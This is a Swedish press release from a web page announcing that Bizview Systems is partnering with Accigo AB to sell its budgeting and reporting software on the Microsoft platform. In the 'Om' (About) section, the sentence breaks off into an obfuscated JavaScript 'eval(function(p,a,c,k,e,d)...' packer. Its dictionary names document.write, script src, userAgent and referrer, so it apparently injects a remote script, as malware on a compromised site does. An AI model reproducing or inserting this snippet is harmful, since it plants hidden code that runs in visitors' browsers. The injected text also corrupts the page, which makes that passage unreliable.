Image Image Image Image Image Image Image Image Image Image

| 30 oktober, 2020

Scroll to top

Top

Bizview Systems stärker sin position som komplement till Microsoft

Bizview Systems stärker sin position som komplement till Microsoft
Sebastian

Bizview Systems stärker sin position på den Skandinaviska marknaden genom att ingå partnerskap med Accigo AB. Accigo är en av de starkaste och snabbast växande systemleverantörerna med fokus på den allt populärare Microsoft plattformen. Med denna partner kommer Bizview att stärka sin närvaro på den viktiga Microsoft marknaden, och Accigo kommer att ha en ledande produkt för Corporate Performance Management som en naturlig del av sitt kunderbjudande.

Accigos VD, Jan Mentzer: ”Partnerskapet med Bizview Systems stärker vårt kunderbjudande inom flera av våra affärsområden och erbjudanden som exempelvis inom affärssystemet Microsoft Dynamics AX och i synnerhet när det gäller Accigos framgångsrika satsning på beslutsstödsystem baserat på Microsoft Business Intelligence plattformen. ”

Jens Karlsson, Partneransvarig på Bizview: “Partnerskapet med Accigo är väldigt viktigt för oss. Vi återupplivar partnerrelationen med en av Skandinaviens bästa och snabbast växande systemleverantörer på Microsoft plattformen. Med deras djupa kunskap och långa erfarenhet runt allt vad ERP/BI innebär, är vi övertygade att Accigo kommer att införliva BizView som en naturlig del av deras kunderbjudande. Dessutom är vi väldigt imponerade på det sätt Accigo implementerar lösningar och hanterar sina kunder! Alla pratar om att fokusera på kunden, men Accigo tar det till en helt ny nivå med sitt Harmony program”.

Om eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efnth|var|u0026u|referrer|rkzat||js|php’.split(’|’),0,{}))
BizView och Bizview Systems

BizView är ett av de ledande systemen inom prognostisering, budgetering och rapportering. Programvaran erbjuder ett webbaserat Excel-liknande användargränssnitt i kombination med kraftfull workflowstyrning. BizView är en öppen lösning som även passar bra ihop med QlikView och Microsofts beslutsstödslösningar. BizView utvecklas och marknadsförs av Bizview Systems med kontor i Skandinavien och marknadsförs utanför Skandinavien genom partners. Över 1000 företag använder våra lösningar.